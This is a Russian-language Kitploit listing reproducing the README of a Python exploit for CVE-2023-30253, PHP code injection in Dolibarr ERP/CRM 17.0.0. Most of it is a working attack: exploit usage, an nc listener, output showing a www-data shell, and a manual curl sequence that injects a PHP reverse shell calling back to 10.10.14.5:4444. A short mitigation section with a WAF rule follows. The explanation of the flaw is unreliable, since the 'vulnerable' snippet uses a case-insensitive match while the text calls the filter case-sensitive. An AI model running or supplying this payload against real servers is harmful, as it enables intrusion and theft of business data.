Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-30253-exploit — CVE-2023-30253 — Dolibarr ERP/CRM 17.0.0 RCE через инъекцию PHP-кода (образовательный эксплойт) | Kitploit
Инструменты/GitHubGitHub/jeanback1/cve-2023-30253-exploit
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubjeanback1/cve-2023-30253-exploit

CVE-2023-30253-exploit

CVE-2023-30253 — Dolibarr ERP/CRM 17.0.0 RCE через инъекцию PHP-кода (образовательный эксплойт)

Репозиторий
2 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Сайт

CVE-2023-30253 — Dolibarr ERP/CRM 17.0.0 Удаленное выполнение кода

Python 3.8+ License CVSS

Эксплойт PHP-инъекции для Dolibarr ERP/CRM v17.0.0, позволяющий получить обратную оболочку от пользователя www-data через модуль Website/CMS.

⚠️ Только для образовательных целей и аудита с разрешения.


📑 Содержание

  • Что такое CVE-2023-30253?
  • Как работает уязвимость?
  • Воздействие
  • Что делает этот эксплойт?
  • Требования
  • Установка
  • Использование
  • Практический пример
  • Эксплойт пошагово
  • Смягчение
  • Ссылки

🔍 Что такое CVE-2023-30253?

CVE-2023-30253 — это уязвимость внедрения PHP-кода (CWE-94: Improper Control of Generation of Code) в Dolibarr ERP/CRM версий ниже 17.0.1.

Была обнаружена и сообщена командой Swascan (ныне Hacktivesecurity) в мае 2023 года. Уязвимость находится в модуле Website/CMS, который позволяет аутентифицированным пользователям создавать и управлять веб-сайтами в Dolibarr.


⚙️ Как работает уязвимость?

Dolibarr реализует фильтр для предотвращения внедрения PHP-кода в содержимое страниц модуля Website. Однако у этого фильтра есть критический недостаток: он чувствителен к регистру.

root@kitploit:~
// Уязвимый код (упрощённый) в Dolibarr 17.0.0
if (preg_match('/<\?php/i', $content)) {
    // Блокирует только "<?php" в точном нижнем регистре... или нет?
    die("PHP code detected!");
}

Фильтр ищет буквально строку <?php в нижнем регистре. Но PHP допускает любое сочетание регистров для открывающего тега. Это означает:

Эксплойт использует <?PHP (в верхнем регистре) для обхода фильтра, но подойдёт любой вариант.

Кроме того, фильтр применяется только в момент сохранения содержимого. При отдаче страницы Dolibarr передаёт содержимое интерпретатору PHP без дополнительной очистки, и тот выполняет любой код с открывающим тегом <?.


💥 Воздействие

Аутентифицированный злоумышленник может:

  • Удалённое выполнение команд (RCE) на сервере
  • Получить доступ к базе данных Dolibarr (клиенты, счета, пользователи)
  • Читать чувствительные файлы системы (/etc/passwd, конфигурация)
  • Использовать сервер как точку опоры для внутренних атак
  • Установить вредоносное ПО, веб-шеллы или постоянные бэкдоры

Почему это критично? Dolibarr используется как корпоративная ERP/CRM. Вторжение может раскрыть данные клиентов, финансовые данные, контракты и внутренние учётные записи.


🛠️ Что делает этот эксплойт?

Эксплойт автоматизирует полный процесс эксплуатации в 5 шагов:

root@kitploit:~
┌─────────────────────────────────────────────────────────┐
│                   CVE-2023-30253                       │
│                                                         │
│  1. Вход         → Аутентификация в Dolibarr           │
│  2. Создать сайт → Создание пустого веб-сайта          │
│  3. Создать стр. → Создание страницы на сайте          │
│  4. Внедрить шелл→ Внедрение PHP reverse shell         │
│  5. Запуск       → Выполнение полезной нагрузки        │
│                                                         │
│  Результат: 🎯 Обратная оболочка от www-data           │
└─────────────────────────────────────────────────────────┘

Особенности:

  • ✅ Автоматическая обработка anti-CSRF токенов
  • ✅ Постоянная сессия с куками
  • ✅ Автоматическое определение pageid
  • ✅ Подробный режим для отладки
  • ✅ Цветной вывод (отключаемый)
  • ✅ Полезная нагрузка reverse shell через fsockopen + proc_open

📋 Требования

  • Python 3.8+
  • requests
  • beautifulsoup4

Или просто:

root@kitploit:~
pip install -r requirements.txt

📦 Установка

root@kitploit:~
# Клонирование репозитория
git clone https://github.com/jeanback1/CVE-2023-30253-exploit.git
cd CVE-2023-30253-exploit

# Установка зависимостей
pip install -r requirements.txt

🚀 Использование

root@kitploit:~
python exploit.py <target> <username> <password> <lhost> <lport> [опции]

Позиционные аргументы:

Опции:

ОпцияОписание
-v, --verboseПоказывает подробную отладочную информацию
--no-colorОтключает цвета в выводе
-h, --helpПоказывает справку и примеры

🎯 Практический пример

Терминал 1 — Запуск слушателя reverse shell

root@kitploit:~
nc -lvnp 4444

Терминал 2 — Запуск эксплойта

root@kitploit:~
python exploit.py http://crm.board.htb admin admin 10.10.14.5 4444 --verbose

Ожидаемый вывод

root@kitploit:~
════════════════════════════════════════════════════════
 CVE-2023-30253 — Dolibarr 17.0.0 RCE Exploit
════════════════════════════════════════════════════════

  Target:   http://crm.board.htb
  User:     admin
  LHOST:    10.10.14.5
  LPORT:    4444
  Site ID:  s3a1f2bc

──────────────────────────────────────────────────

[10:45:12] Шаг 1/5: Вход в систему...
[10:45:12]   ✓ Сессия успешно начата

[10:45:13] Шаг 2/5: Создание веб-сайта...
[10:45:13]   ✓ Веб-сайт 's3a1f2bc' создан

[10:45:13] Шаг 3/5: Создание страницы на сайте...
[10:45:13]   ✓ Страница создана на сайте

[10:45:14] Шаг 4/5: Внедрение обратной оболочки → 10.10.14.5:4444...
[10:45:14]   ✓ Код PHP успешно внедрен

[10:45:14] Шаг 5/5: Выполнение полезной нагрузки (trigger)...

════════════════════════════════════════════════════════
  ЭКСПЛУАТАЦИЯ ЗАВЕРШЕНА
════════════════════════════════════════════════════════

  Trigger URL:
  http://crm.board.htb/public/website/index.php?website=s3a1f2bc&pageref=s3a1f2bc

  Инструкции:
  1. В другом терминале запустите слушатель:
     nc -lvnp 4444
  2. Перейдите по Trigger URL (эксплойт уже это сделал)
  3. Вы получите обратную оболочку от www-data

Терминал 1 — Получена оболочка 🎯

root@kitploit:~
Listening on 0.0.0.0 4444
Connection received on 10.129.231.37 52846
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

🔬 Эксплойт пошагово

Если вы предпочитаете понять процесс вручную (без скрипта), вот полный поток:

1. Аутентификация

root@kitploit:~
# Получить куки и CSRF-токен
curl -c cookies.txt http://crm.board.htb/ > /dev/null

# Извлечь токен
TOKEN=$(curl -s -b cookies.txt http://crm.board.htb/ \
  | grep -oP 'name="anti-csrf-newtoken" content="\K[^"]+')

# Логин
curl -b cookies.txt -c cookies.txt \
  -X POST "http://crm.board.htb/index.php?mainmenu=home" \
  -d "token=$TOKEN&actionlogin=login&loginfunction=loginfunction&username=admin&password=admin"

2. Создание веб-сайта

root@kitploit:~
TOKEN=$(curl -s -b cookies.txt \
  "http://crm.board.htb/website/index.php?action=createsite" \
  | grep -oP 'name="anti-csrf-newtoken" content="\K[^"]+')

curl -b cookies.txt -X POST \
  "http://crm.board.htb/website/index.php" \
  -d "token=$TOKEN&action=addsite&WEBSITE_REF=misitio&WEBSITE_TITLE=misitio&addcontainer=Create"

⚠️ Урок: Правильный параметр action — addsite, а не add, как указано в некоторых публичных эксплойтах.

3. Создание страницы

root@kitploit:~
TOKEN=$(curl -s -b cookies.txt \
  "http://crm.board.htb/website/index.php?website=misitio" \
  | grep -oP 'name="anti-csrf-newtoken" content="\K[^"]+')

curl -b cookies.txt -X POST \
  "http://crm.board.htb/website/index.php" \
  -d "token=$TOKEN&action=addcontainer&website=misitio&WEBSITE_TYPE_CONTAINER=page&WEBSITE_TITLE=TEST&addcontainer=Create"

4. Внедрение PHP-кода

root@kitploit:~
TOKEN=$(curl -s -b cookies.txt \
  "http://crm.board.htb/website/index.php?website=misitio&pageid=1&action=editsource" \
  | grep -oP 'name="anti-csrf-newtoken" content="\K[^"]+')

PHP='<?PHP $s=fsockopen("10.10.14.5",4444);proc_open("/bin/sh -i",array(0=>$s,1=>$s,2=>$s),$p);?>'

curl -b cookies.txt -X POST \
  "http://crm.board.htb/website/index.php" \
  --data-urlencode "token=$TOKEN" \
  --data-urlencode "action=updatesource" \
  --data-urlencode "website=misitio" \
  --data-urlencode "PAGE_CONTENT=$PHP"

🔑 Ключ атаки: Правильное поле — PAGE_CONTENT, а не WEBSITE_CONTENT. У многих публичных PoC эта ошибка.

5. Выполнение полезной нагрузки

root@kitploit:~
curl "http://crm.board.htb/public/website/index.php?website=misitio&pageref=misitio"

🛡️ Смягчение

Для защиты сервера Dolibarr от этой уязвимости:

Обновление (рекомендуется)

root@kitploit:~
# Обновить до Dolibarr 17.0.1 или новее
# Патч исправляет фильтр для обнаружения любой вариации <?php

Отключение модуля Website

Если вы не используете модуль Website/CMS, отключите его:

root@kitploit:~
Home → Setup → Modules → Website → Выключить

Правила WAF (mod_security)

root@kitploit:~
# Блокировать любые вариации PHP-тегов в поле PAGE_CONTENT
SecRule ARGS:PAGE_CONTENT "@rx <\?php|< \?php|<\?PHP|<\?[pP][hH][pP]" \
  "id:1001,phase:2,deny,status:403,msg:'CVE-2023-30253 PHP Injection blocked'"

Принцип минимальных привилегий

  • Не используйте учётные записи администратора для повседневных задач
  • Ограничьте доступ к модулю Website для тех, кому это действительно необходимо

📚 Ссылки

  • NVD — CVE-2023-30253
  • Swascan Advisory — Dolibarr 17.0.0 Analysis
  • Dolibarr GitHub — Коммит патча
  • CWE-94: Code Injection
  • Hacktivesecurity — Оригинальный отчёт

📝 Отказ от ответственности

Этот проект создан с образовательными и исследовательскими целями в области информационной безопасности. Использование этого эксплойта против систем без явного разрешения незаконно и этически неприемлемо.

Как специалист по кибербезопасности, я твердо верю в:

  • Ответственное раскрытие уязвимостей
  • Этичный хакинг с разрешения
  • Распространение знаний для повышения общей безопасности

Создано Jean Carlos
Студент по кибербезопасности | Пентестинг | CTF Player
CVE-2021-3560 • CVE-2023-27163 • CVE-2024-46986 • CVE-2025-2304

Скачать инструмент
ПолеЗначение
CVECVE-2023-30253
CVSS v3.18.8 (ВЫСОКИЙ)
ВекторAV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
ТипCWE-94 — Внедрение кода
Затронутое ПОDolibarr ERP/CRM < 17.0.1
ПривилегииАутентифицированный пользователь (любая роль)
ПатчDolibarr 17.0.1 — коммит 4f6055c
ТегОтфильтровано?Выполнено PHP?
<?php ... ?>✅✅
<?PHP ... ?>❌✅
<?Php ... ?>❌✅
<?pHp ... ?>❌✅
АргументОписаниеПример
targetБазовый URL Dolibarrhttp://crm.board.htb
usernameПользователь Dolibarradmin
passwordПароль Dolibarradmin
lhostВаш IP (для получения оболочки)10.10.14.5
lportВаш порт (для получения оболочки)4444